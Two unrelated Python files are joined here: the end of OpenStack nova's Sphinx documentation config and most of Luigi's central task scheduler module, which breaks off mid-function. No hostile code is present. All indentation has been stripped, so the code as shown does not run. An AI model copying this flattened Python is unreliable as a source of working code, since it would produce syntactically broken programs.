if os.getenv('HUDSON_PUBLISH_DOCS'):
templates_path = ['_ga', '_templates']
else:
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'nova'
copyright = u'2010-present, OpenStack Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
from nova.version import version_info
# The full version, including alpha/beta/rc tags.
release = version_info.release_string()
# The short X.Y version.
version = version_info.version_string()
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
unused_docs = [
'api_ext/rst_extension_template',
'vmwareapi_readme',
'installer',
]
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use
# for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['nova.']
# -- Options for man page output ----------------------------------------------
# Grouping the document tree for man pages.
# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
man_pages = [
('man/nova-all', 'nova-all', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-api-ec2', 'nova-api-ec2', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-api-metadata', 'nova-api-metadata', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-api-os-compute', 'nova-api-os-compute',
u'Cloud controller fabric', [u'OpenStack'], 1),
('man/nova-api', 'nova-api', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-cert', 'nova-cert', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-compute', 'nova-compute', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-console', 'nova-console', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-consoleauth', 'nova-consoleauth', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-dhcpbridge', 'nova-dhcpbridge', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-manage', 'nova-manage', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-network', 'nova-network', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-novncproxy', 'nova-novncproxy', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-spicehtml5proxy', 'nova-spicehtml5proxy', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-objectstore', 'nova-objectstore', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-rootwrap', 'nova-rootwrap', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-rpc-zmq-receiver', 'nova-rpc-zmq-receiver', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-scheduler', 'nova-scheduler', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-xvpvncproxy', 'nova-xvpvncproxy', u'Cloud controller fabric',
[u'OpenStack'], 1),
('man/nova-conductor', 'nova-conductor', u'Cloud controller fabric',
[u'OpenStack'], 1),
]
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
git_cmd = "git log --pretty=format:'%ad, commit %h' --date=local -n1"
html_last_updated_fmt = os.popen(git_cmd).read()
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'novadoc'
# -- Options for LaTeX output -------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'Nova.tex', u'Nova Documentation',
u'OpenStack Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'python': ('http://docs.python.org/', None),
'swift': ('http://swift.openstack.org', None)}
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
The system for scheduling tasks and executing them in order.
Deals with dependencies, priorities, resources, etc.
The :py:class:`~luigi.worker.Worker` pulls tasks from the scheduler (usually over the REST interface) and executes them.
See :doc:`/central_scheduler` for more info.
"""
import collections
try:
import cPickle as pickle
except ImportError:
import pickle
import datetime
import functools
import itertools
import logging
import os
import time
from luigi import six
from luigi import configuration
from luigi import notifications
from luigi import parameter
from luigi import task_history as history
from luigi.task_status import DISABLED, DONE, FAILED, PENDING, RUNNING, SUSPENDED, UNKNOWN
from luigi.task import Config
logger = logging.getLogger("luigi.server")
class Scheduler(object):
"""
Abstract base class.
Note that the methods all take string arguments, not Task objects...
"""""
add_task = NotImplemented
get_work = NotImplemented
ping = NotImplemented
UPSTREAM_RUNNING = 'UPSTREAM_RUNNING'
UPSTREAM_MISSING_INPUT = 'UPSTREAM_MISSING_INPUT'
UPSTREAM_FAILED = 'UPSTREAM_FAILED'
UPSTREAM_DISABLED = 'UPSTREAM_DISABLED'
UPSTREAM_SEVERITY_ORDER = (
'',
UPSTREAM_RUNNING,
UPSTREAM_MISSING_INPUT,
UPSTREAM_FAILED,
UPSTREAM_DISABLED,
)
UPSTREAM_SEVERITY_KEY = UPSTREAM_SEVERITY_ORDER.index
STATUS_TO_UPSTREAM_MAP = {
FAILED: UPSTREAM_FAILED,
RUNNING: UPSTREAM_RUNNING,
PENDING: UPSTREAM_MISSING_INPUT,
DISABLED: UPSTREAM_DISABLED,
}
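# The severity order above is consumed via max(..., key=UPSTREAM_SEVERITY_KEY): for
# example, max(['', UPSTREAM_RUNNING, UPSTREAM_FAILED], key=UPSTREAM_SEVERITY_KEY)
# is UPSTREAM_FAILED, so a task's upstream status ends up being the most severe
# status found among its (transitive) dependencies.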
class scheduler(Config):
# TODO(erikbern): the config_path is needed for backwards compatibility. We should drop the compatibility
# at some point (in particular this would force users to replace all dashes with underscores in the config)
retry_delay = parameter.FloatParameter(default=900.0)
remove_delay = parameter.FloatParameter(default=600.0)
worker_disconnect_delay = parameter.FloatParameter(default=60.0)
state_path = parameter.Parameter(default='/var/lib/luigi-server/state.pickle')
# Jobs are disabled if we see more than disable_failures failures in disable_window seconds.
# These disables last for disable_persist seconds.
disable_window = parameter.IntParameter(default=3600,
config_path=dict(section='scheduler', name='disable-window-seconds'))
disable_failures = parameter.IntParameter(default=None,
config_path=dict(section='scheduler', name='disable-num-failures'))
disable_hard_timeout = parameter.IntParameter(default=None,
config_path=dict(section='scheduler', name='disable-hard-timeout'))
disable_persist = parameter.IntParameter(default=86400,
config_path=dict(section='scheduler', name='disable-persist-seconds'))
max_shown_tasks = parameter.IntParameter(default=100000)
prune_done_tasks = parameter.BoolParameter(default=False)
record_task_history = parameter.BoolParameter(default=False)
prune_on_get_work = parameter.BoolParameter(default=False)
def fix_time(x):
# Backwards compatibility for a fix in Dec 2014. Prior to the fix, pickled state might store datetime objects
# Let's remove this function soon
if isinstance(x, datetime.datetime):
return time.mktime(x.timetuple())
else:
return x
class Failures(object):
"""
This class tracks the number of failures in a given time window.
Failures added are marked with the current timestamp, and this class counts
the number of failures in a sliding time window ending at the present.
"""
def __init__(self, window):
"""
Initialize with the given window.
:param window: how long to track failures for, as a float (number of seconds).
"""
self.window = window
self.failures = collections.deque()
self.first_failure_time = None
def add_failure(self):
"""
Add a failure event with the current timestamp.
"""
failure_time = time.time()
if not self.first_failure_time:
self.first_failure_time = failure_time
self.failures.append(failure_time)
def num_failures(self):
"""
Return the number of failures in the window.
"""
min_time = time.time() - self.window
while self.failures and fix_time(self.failures[0]) < min_time:
self.failures.popleft()
return len(self.failures)
def clear(self):
"""
Clear the failure queue.
"""
self.failures.clear()
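# Illustrative sketch of the sliding window (not part of the scheduler API):
#
#     f = Failures(window=60)      # track failures over the last 60 seconds
#     f.add_failure()
#     f.add_failure()
#     f.num_failures()             # -> 2 while both timestamps are under 60s old
#
# num_failures() pops timestamps older than the window before counting, so the
# count decays automatically as time passes without new failures.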
def _get_default(x, default):
if x is not None:
return x
else:
return default
class Task(object):
def __init__(self, task_id, status, deps, resources=None, priority=0, family='', module=None,
params=None, disable_failures=None, disable_window=None, disable_hard_timeout=None):
self.id = task_id
self.stakeholders = set()  # worker ids that are somehow related to this task (i.e. don't prune while any of these workers are still active)
self.workers = set()  # worker ids that can perform task - task is 'BROKEN' if none of these workers are active
if deps is None:
self.deps = set()
else:
self.deps = set(deps)
self.status = status # PENDING, RUNNING, FAILED or DONE
self.time = time.time() # Timestamp when task was first added
self.retry = None
self.remove = None
self.worker_running = None # the worker id that is currently running the task or None
self.time_running = None # Timestamp when picked up by worker
self.expl = None
self.priority = priority
self.resources = _get_default(resources, {})
self.family = family
self.module = module
self.params = _get_default(params, {})
self.disable_failures = disable_failures
self.disable_hard_timeout = disable_hard_timeout
self.failures = Failures(disable_window)
self.scheduler_disable_time = None
self.runnable = False
def __repr__(self):
return "Task(%r)" % vars(self)
def add_failure(self):
self.failures.add_failure()
def has_excessive_failures(self):
if (self.failures.first_failure_time is not None and
self.disable_hard_timeout):
if (time.time() >= self.failures.first_failure_time +
self.disable_hard_timeout):
return True
if self.failures.num_failures() >= self.disable_failures:
return True
return False
def can_disable(self):
return (self.disable_failures is not None or
self.disable_hard_timeout is not None)
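# Example of the disable logic above (assumed config values): with disable_failures=3
# and disable_window=3600, a task that fails 3 times within an hour reports
# has_excessive_failures() == True; if disable_hard_timeout is set, it also trips once
# that many seconds have passed since the first recorded failure, regardless of count.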
class Worker(object):
"""
Structure for tracking worker activity and keeping their references.
"""
def __init__(self, worker_id, last_active=None):
self.id = worker_id
self.reference = None # reference to the worker in the real world. (Currently a dict containing just the host)
self.last_active = last_active or time.time() # seconds since epoch
self.last_get_work = None
self.started = time.time() # seconds since epoch
self.tasks = set() # task objects
self.info = {}
def add_info(self, info):
self.info.update(info)
def update(self, worker_reference, get_work=False):
if worker_reference:
self.reference = worker_reference
self.last_active = time.time()
if get_work:
self.last_get_work = time.time()
def prune(self, config):
# Delete workers that haven't said anything for a while (probably killed)
if self.last_active + config.worker_disconnect_delay < time.time():
return True
def get_pending_tasks(self, state):
"""
Get PENDING (and RUNNING) tasks for this worker.
You have to pass in the state for optimization reasons.
"""
if len(self.tasks) < state.num_pending_tasks():
return six.moves.filter(lambda task: task.status in [PENDING, RUNNING],
self.tasks)
else:
return state.get_pending_tasks()
def is_trivial_worker(self, state):
"""
A worker is trivial if it is not an assistant and only has tasks without
resource requirements.
We have to pass the state parameter for optimization reasons.
"""
if self.assistant:
return False
return all(not task.resources for task in self.get_pending_tasks(state))
@property
def assistant(self):
return self.info.get('assistant', False)
def __str__(self):
return self.id
class SimpleTaskState(object):
"""
Keep track of the current state and handle persistence.
The point of this class is to enable other ways to keep state, e.g. by using a database.
These will be implemented by creating an abstract base class that this and other classes
inherit from.
"""
def __init__(self, state_path):
self._state_path = state_path
self._tasks = {} # map from id to a Task object
self._status_tasks = collections.defaultdict(dict)
self._active_workers = {} # map from id to a Worker object
def get_state(self):
return self._tasks, self._active_workers
def set_state(self, state):
self._tasks, self._active_workers = state
def dump(self):
try:
with open(self._state_path, 'wb') as fobj:
pickle.dump(self.get_state(), fobj)
except IOError:
logger.warning("Failed saving scheduler state", exc_info=1)
else:
logger.info("Saved state in %s", self._state_path)
# Note: unpickling old state with updated code is prone to crashes. TODO: some kind of version control?
def load(self):
if os.path.exists(self._state_path):
logger.info("Attempting to load state from %s", self._state_path)
try:
with open(self._state_path, 'rb') as fobj:
state = pickle.load(fobj)
except BaseException:
logger.exception("Error when loading state. Starting from clean slate.")
return
self.set_state(state)
self._status_tasks = collections.defaultdict(dict)
for task in six.itervalues(self._tasks):
self._status_tasks[task.status][task.id] = task
# Convert from old format
# TODO: this is really ugly, we need something more future-proof
# Every time we add an attribute to the Worker or Task class, this
# code needs to be updated
# Compatibility since 2014-06-02
for k, v in six.iteritems(self._active_workers):
if isinstance(v, float):
self._active_workers[k] = Worker(worker_id=k, last_active=v)
# Compatibility since 2015-05-28
if any(not hasattr(w, 'tasks') for k, w in six.iteritems(self._active_workers)):
# If you load from an old format where Workers don't contain tasks.
for k, worker in six.iteritems(self._active_workers):
worker.tasks = set()
for task in six.itervalues(self._tasks):
for worker_id in task.workers:
self._active_workers[worker_id].tasks.add(task)
# Compatibility since 2015-04-28
if any(not hasattr(t, 'disable_hard_timeout') for t in six.itervalues(self._tasks)):
for t in six.itervalues(self._tasks):
t.disable_hard_timeout = None
else:
logger.info("No prior state file exists at %s. Starting with clean slate", self._state_path)
def get_active_tasks(self, status=None):
if status:
for task in six.itervalues(self._status_tasks[status]):
yield task
else:
for task in six.itervalues(self._tasks):
yield task
def get_running_tasks(self):
return six.itervalues(self._status_tasks[RUNNING])
def get_pending_tasks(self):
return itertools.chain.from_iterable(six.itervalues(self._status_tasks[status])
for status in [PENDING, RUNNING])
def num_pending_tasks(self):
"""
Return how many tasks are PENDING + RUNNING. O(1).
"""
return len(self._status_tasks[PENDING]) + len(self._status_tasks[RUNNING])
def get_task(self, task_id, default=None, setdefault=None):
if setdefault:
task = self._tasks.setdefault(task_id, setdefault)
self._status_tasks[task.status][task.id] = task
return task
else:
return self._tasks.get(task_id, default)
def has_task(self, task_id):
return task_id in self._tasks
def re_enable(self, task, config=None):
task.scheduler_disable_time = None
task.failures.clear()
if config:
self.set_status(task, FAILED, config)
task.failures.clear()
def set_status(self, task, new_status, config=None):
if new_status == FAILED:
assert config is not None
if new_status == DISABLED and task.status == RUNNING:
return
if task.status == DISABLED:
if new_status == DONE:
self.re_enable(task)
# don't allow workers to override a scheduler disable
elif task.scheduler_disable_time is not None:
return
if new_status == FAILED and task.can_disable():
task.add_failure()
if task.has_excessive_failures():
task.scheduler_disable_time = time.time()
new_status = DISABLED
notifications.send_error_email(
'Luigi Scheduler: DISABLED {task} due to excessive failures'.format(task=task.id),
'{task} failed {failures} times in the last {window} seconds, so it is being '
'disabled for {persist} seconds'.format(
failures=config.disable_failures,
task=task.id,
window=config.disable_window,
persist=config.disable_persist,
))
elif new_status == DISABLED:
task.scheduler_disable_time = None
self._status_tasks[task.status].pop(task.id)
self._status_tasks[new_status][task.id] = task
task.status = new_status
def fail_dead_worker_task(self, task, config, assistants):
# If a running worker disconnects, tag all its jobs as FAILED and subject them to the same retry logic
if task.status == RUNNING and task.worker_running and task.worker_running not in task.stakeholders | assistants:
logger.info("Task %r is marked as running by disconnected worker %r -> marking as "
"FAILED with retry delay of %rs", task.id, task.worker_running,
config.retry_delay)
task.worker_running = None
self.set_status(task, FAILED, config)
task.retry = time.time() + config.retry_delay
def prune(self, task, config):
remove = False
# Mark tasks with no remaining active stakeholders for deletion
if not task.stakeholders:
if task.remove is None:
logger.info("Task %r has stakeholders %r but none remain connected -> will remove "
"task in %s seconds", task.id, task.stakeholders, config.remove_delay)
task.remove = time.time() + config.remove_delay
# Re-enable task after the disable time expires
if task.status == DISABLED and task.scheduler_disable_time:
if time.time() - fix_time(task.scheduler_disable_time) > config.disable_persist:
self.re_enable(task, config)
# Remove tasks that have no stakeholders
if task.remove and time.time() > task.remove:
logger.info("Removing task %r (no connected stakeholders)", task.id)
remove = True
# Reset FAILED tasks to PENDING if max timeout is reached, and retry delay is >= 0
if task.status == FAILED and config.retry_delay >= 0 and task.retry < time.time():
self.set_status(task, PENDING, config)
return remove
def inactivate_tasks(self, delete_tasks):
# The terminology is a bit confusing: we used to "delete" tasks when they became inactive,
# but with a pluggable state storage, you might very well want to keep some history of
# older tasks as well. That's why we call it "inactivate" (as in the verb)
for task in delete_tasks:
task_obj = self._tasks.pop(task)
self._status_tasks[task_obj.status].pop(task)
def get_active_workers(self, last_active_lt=None, last_get_work_gt=None):
for worker in six.itervalues(self._active_workers):
if last_active_lt is not None and worker.last_active >= last_active_lt:
continue
last_get_work = getattr(worker, 'last_get_work', None)
if last_get_work_gt is not None and (
last_get_work is None or last_get_work <= last_get_work_gt):
continue
yield worker
def get_assistants(self, last_active_lt=None):
return filter(lambda w: w.assistant, self.get_active_workers(last_active_lt))
def get_worker_ids(self):
return self._active_workers.keys() # only used for unit tests
def get_worker(self, worker_id):
return self._active_workers.setdefault(worker_id, Worker(worker_id))
def inactivate_workers(self, delete_workers):
# Mark workers as inactive
for worker in delete_workers:
self._active_workers.pop(worker)
# remove workers from tasks
for task in self.get_active_tasks():
task.stakeholders.difference_update(delete_workers)
task.workers.difference_update(delete_workers)
def get_necessary_tasks(self):
necessary_tasks = set()
for task in self.get_active_tasks():
if task.status not in (DONE, DISABLED) or \
getattr(task, 'scheduler_disable_time', None) is not None:
necessary_tasks.update(task.deps)
necessary_tasks.add(task.id)
return necessary_tasks
class CentralPlannerScheduler(Scheduler):
"""
Async scheduler that can handle multiple workers, etc.
Can be run locally or on a server (using RemoteScheduler + server.Server).
"""
def __init__(self, config=None, resources=None, task_history_impl=None, **kwargs):
"""
Keyword Arguments:
:param config: an object of class "scheduler" or None (in which case the global instance will be used)
:param resources: a dict of str->int constraints
:param task_history_impl: ignore config and use this object as the task history
"""
self._config = config or scheduler(**kwargs)
self._state = SimpleTaskState(self._config.state_path)
if task_history_impl:
self._task_history = task_history_impl
elif self._config.record_task_history:
from luigi import db_task_history # Needs sqlalchemy, thus imported here
self._task_history = db_task_history.DbTaskHistory()
else:
self._task_history = history.NopHistory()
self._resources = resources or configuration.get_config().getintdict('resources') # TODO: Can we make this a Parameter?
self._make_task = functools.partial(
Task, disable_failures=self._config.disable_failures,
disable_hard_timeout=self._config.disable_hard_timeout,
disable_window=self._config.disable_window)
self._worker_requests = {}
def load(self):
self._state.load()
def dump(self):
self._state.dump()
def prune(self):
logger.info("Starting pruning of task graph")
remove_workers = []
for worker in self._state.get_active_workers():
if worker.prune(self._config):
logger.info("Worker %s timed out (no contact for >=%ss)", worker, self._config.worker_disconnect_delay)
remove_workers.append(worker.id)
self._state.inactivate_workers(remove_workers)
assistant_ids = set(w.id for w in self._state.get_assistants())
remove_tasks = []
if assistant_ids:
necessary_tasks = self._state.get_necessary_tasks()
else:
necessary_tasks = ()
for task in self._state.get_active_tasks():
self._state.fail_dead_worker_task(task, self._config, assistant_ids)
if task.id not in necessary_tasks and self._state.prune(task, self._config):
remove_tasks.append(task.id)
self._state.inactivate_tasks(remove_tasks)
logger.info("Done pruning task graph")
def update(self, worker_id, worker_reference=None, get_work=False):
"""
Keep track of whenever the worker was last active.
"""
worker = self._state.get_worker(worker_id)
worker.update(worker_reference, get_work=get_work)
def _update_priority(self, task, prio, worker):
"""
Update priority of the given task.
Priority can only be increased.
If the task doesn't exist, a placeholder task is created to preserve priority when the task is later scheduled.
"""
task.priority = prio = max(prio, task.priority)
for dep in task.deps or []:
t = self._state.get_task(dep)
if t is not None and prio > t.priority:
self._update_priority(t, prio, worker)
def add_task(self, task_id=None, status=PENDING, runnable=True,
deps=None, new_deps=None, expl=None, resources=None,
priority=0, family='', module=None, params=None,
assistant=False, **kwargs):
"""
* add task identified by task_id if it doesn't exist
* if deps is not None, update dependency list
* update status of task
* add additional workers/stakeholders
* update priority when needed
"""
worker_id = kwargs['worker']
self.update(worker_id)
task = self._state.get_task(task_id, setdefault=self._make_task(
task_id=task_id, status=PENDING, deps=deps, resources=resources,
priority=priority, family=family, module=module, params=params))
# for setting priority, we'll sometimes create tasks with unset family and params
if not task.family:
task.family = family
if not getattr(task, 'module', None):
task.module = module
if not task.params:
task.params = _get_default(params, {})
if task.remove is not None:
task.remove = None # unmark task for removal so it isn't removed after being added
if expl is not None:
task.expl = expl
if not (task.status == RUNNING and status == PENDING) or new_deps:
# don't allow re-scheduling of task while it is running, it must either fail or succeed first
if status == PENDING or status != task.status:
# Update the DB only if there was an actual change, to prevent noise.
# We also check for status == PENDING b/c that's the default value
# (so checking for status != task.status would lie)
self._update_task_history(task, status)
self._state.set_status(task, PENDING if status == SUSPENDED else status, self._config)
if status == FAILED:
task.retry = self._retry_time(task, self._config)
if deps is not None:
task.deps = set(deps)
if new_deps is not None:
task.deps.update(new_deps)
if resources is not None:
task.resources = resources
if not assistant:
task.stakeholders.add(worker_id)
# Task dependencies might not exist yet. Let's create dummy tasks for them for now.
# Otherwise the task dependencies might end up being pruned if scheduling takes a long time
for dep in task.deps or []:
t = self._state.get_task(dep, setdefault=self._make_task(task_id=dep, status=UNKNOWN, deps=None, priority=priority))
t.stakeholders.add(worker_id)
self._update_priority(task, priority, worker_id)
if runnable:
task.workers.add(worker_id)
self._state.get_worker(worker_id).tasks.add(task)
task.runnable = runnable
def add_worker(self, worker, info, **kwargs):
self._state.get_worker(worker).add_info(info)
def update_resources(self, **resources):
if self._resources is None:
self._resources = {}
self._resources.update(resources)
def _has_resources(self, needed_resources, used_resources):
if needed_resources is None:
return True
available_resources = self._resources or {}
for resource, amount in six.iteritems(needed_resources):
if amount + used_resources[resource] > available_resources.get(resource, 1):
return False
return True
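# Example: with self._resources = {'gpu': 2}, a task needing {'gpu': 1} passes the
# check while used_resources['gpu'] <= 1; resources that were never declared fall
# back to a capacity of 1 via available_resources.get(resource, 1).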
def _used_resources(self):
used_resources = collections.defaultdict(int)
if self._resources is not None:
for task in self._state.get_active_tasks():
if task.status == RUNNING and task.resources:
for resource, amount in six.iteritems(task.resources):
used_resources[resource] += amount
return used_resources
def _rank(self, task):
"""
Return worker's rank function for task scheduling.
:return:
"""
return task.priority, -task.time
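# Used with tasks.sort(key=self._rank, reverse=True): higher priority sorts first,
# and among equal priorities the older task (smaller task.time, hence larger
# -task.time) wins.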
def _schedulable(self, task):
if task.status != PENDING:
return False
for dep in task.deps:
dep_task = self._state.get_task(dep, default=None)
if dep_task is None or dep_task.status != DONE:
return False
return True
def _retry_time(self, task, config):
return time.time() + config.retry_delay
def get_work(self, host=None, assistant=False, **kwargs):
# TODO: remove any expired nodes
# Algo: iterate over all nodes, find the highest-priority node with no unfinished
# dependencies and available resources.
# Resource checking looks both at currently available resources and at which resources would
# be available if all running tasks died and we rescheduled all workers greedily. We do both
# checks in order to prevent a worker with many low-priority tasks from starving other
# workers with higher priority tasks that share the same resources.
# TODO: remove tasks that can't be done, figure out if the worker has absolutely
# nothing it can wait for
if self._config.prune_on_get_work:
self.prune()
worker_id = kwargs['worker']
# Return remaining tasks that have no FAILED descendants
self.update(worker_id, {'host': host}, get_work=True)
if assistant:
self.add_worker(worker_id, [('assistant', assistant)])
best_task = None
locally_pending_tasks = 0
running_tasks = []
upstream_table = {}
greedy_resources = collections.defaultdict(int)
n_unique_pending = 0
worker = self._state.get_worker(worker_id)
if worker.is_trivial_worker(self._state):
relevant_tasks = worker.get_pending_tasks(self._state)
used_resources = collections.defaultdict(int)
greedy_workers = dict() # If there's no resources, then they can grab any task
else:
relevant_tasks = self._state.get_pending_tasks()
used_resources = self._used_resources()
activity_limit = time.time() - self._config.worker_disconnect_delay
active_workers = self._state.get_active_workers(last_get_work_gt=activity_limit)
greedy_workers = dict((worker.id, worker.info.get('workers', 1))
for worker in active_workers)
tasks = list(relevant_tasks)
tasks.sort(key=self._rank, reverse=True)
for task in tasks:
upstream_status = self._upstream_status(task.id, upstream_table)
in_workers = (assistant and getattr(task, 'runnable', bool(task.workers))) or worker_id in task.workers
if task.status == RUNNING and in_workers:
# Return a list of currently running tasks to the client,
# makes it easier to troubleshoot
other_worker = self._state.get_worker(task.worker_running)
more_info = {'task_id': task.id, 'worker': str(other_worker)}
if other_worker is not None:
more_info.update(other_worker.info)
running_tasks.append(more_info)
if task.status == PENDING and in_workers and upstream_status != UPSTREAM_DISABLED:
locally_pending_tasks += 1
if len(task.workers) == 1 and not assistant:
n_unique_pending += 1
if best_task:
continue
if task.status == RUNNING and (task.worker_running in greedy_workers):
greedy_workers[task.worker_running] -= 1
for resource, amount in six.iteritems((task.resources or {})):
greedy_resources[resource] += amount
if self._schedulable(task) and self._has_resources(task.resources, greedy_resources):
if in_workers and self._has_resources(task.resources, used_resources):
best_task = task
else:
workers = itertools.chain(task.workers, [worker_id]) if assistant else task.workers
for task_worker in workers:
if greedy_workers.get(task_worker, 0) > 0:
# use up a worker
greedy_workers[task_worker] -= 1
# keep track of the resources used in greedy scheduling
for resource, amount in six.iteritems((task.resources or {})):
greedy_resources[resource] += amount
break
reply = {'n_pending_tasks': locally_pending_tasks,
'running_tasks': running_tasks,
'task_id': None,
'n_unique_pending': n_unique_pending}
if best_task:
self._state.set_status(best_task, RUNNING, self._config)
best_task.worker_running = worker_id
best_task.time_running = time.time()
self._update_task_history(best_task, RUNNING, host=host)
reply['task_id'] = best_task.id
reply['task_family'] = best_task.family
reply['task_module'] = getattr(best_task, 'module', None)
reply['task_params'] = best_task.params
return reply
def ping(self, **kwargs):
worker_id = kwargs['worker']
self.update(worker_id)
def _upstream_status(self, task_id, upstream_status_table):
if task_id in upstream_status_table:
return upstream_status_table[task_id]
elif self._state.has_task(task_id):
task_stack = [task_id]
while task_stack:
dep_id = task_stack.pop()
if self._state.has_task(dep_id):
dep = self._state.get_task(dep_id)
if dep.status == DONE:
continue
if dep_id not in upstream_status_table:
if dep.status == PENDING and dep.deps:
task_stack = task_stack + [dep_id] + list(dep.deps)
upstream_status_table[dep_id] = '' # will be updated postorder
else:
dep_status = STATUS_TO_UPSTREAM_MAP.get(dep.status, '')
upstream_status_table[dep_id] = dep_status
elif upstream_status_table[dep_id] == '' and dep.deps:
# This is the postorder update step when we set the
# status based on the previously calculated child elements
upstream_status = [upstream_status_table.get(a_task_id, '') for a_task_id in dep.deps]
upstream_status.append('') # to handle empty list
status = max(upstream_status, key=UPSTREAM_SEVERITY_KEY)
upstream_status_table[dep_id] = status
return upstream_status_table[dep_id]
def _serialize_task(self, task_id, include_deps=True):
task = self._state.get_task(task_id)
ret = {
'status': task.status,
'workers': list(task.workers),
'worker_running': task.worker_running,
'time_running': getattr(task, "time_running", None),
'start_time': task.time,
'params': task.params,
'name': task.family,
'priority': task.priority,
'resources': task.resources,
}
if task.status == DISABLED:
ret['re_enable_able'] = task.scheduler_disable_time is not None
if include_deps:
ret['deps'] = list(task.deps)
return ret
def graph(self, **kwargs):
self.prune()
serialized = {}
for task in self._state.get_active_tasks():
serialized[task.id] = self._serialize_task(task.id)
return serialized
def _recurse_deps(self, task_id, serialized):
if task_id not in serialized:
task = self._state.get_task(task_id)
if task is None or not task.family:
logger.warn('Missing task for id [%s]', task_id)
# try to infer family and params from task_id
try:
family, _, param_str = task_id.rstrip(')').partition('(')
params = dict(param.split('=') for param in param_str.split(', '))
except BaseException:
family, params = '', {}
serialized[task_id] = {
'deps': [],
'status': UNKNOWN,
'workers': [],
'start_time': UNKNOWN,
'params': params,
'name': family,
'priority': 0,
}
else:
serialized[task_id] = self._serialize_task(task_id)
for dep in task.deps:
self._recurse_deps(dep, serialized)
def dep_graph(self, task_id, **kwargs):
self.prune()
serialized = {}
if self._state.has_task(task_id):
self._recurse_deps(task_id, serialized)
return serialized
def task_list(self, status, upstream_status, limit=True, search=None, **kwargs):
"""
Query for a subset of tasks by status.
"""
self.prune()
result = {}
upstream_status_table = {} # used to memoize upstream status
if search is None:
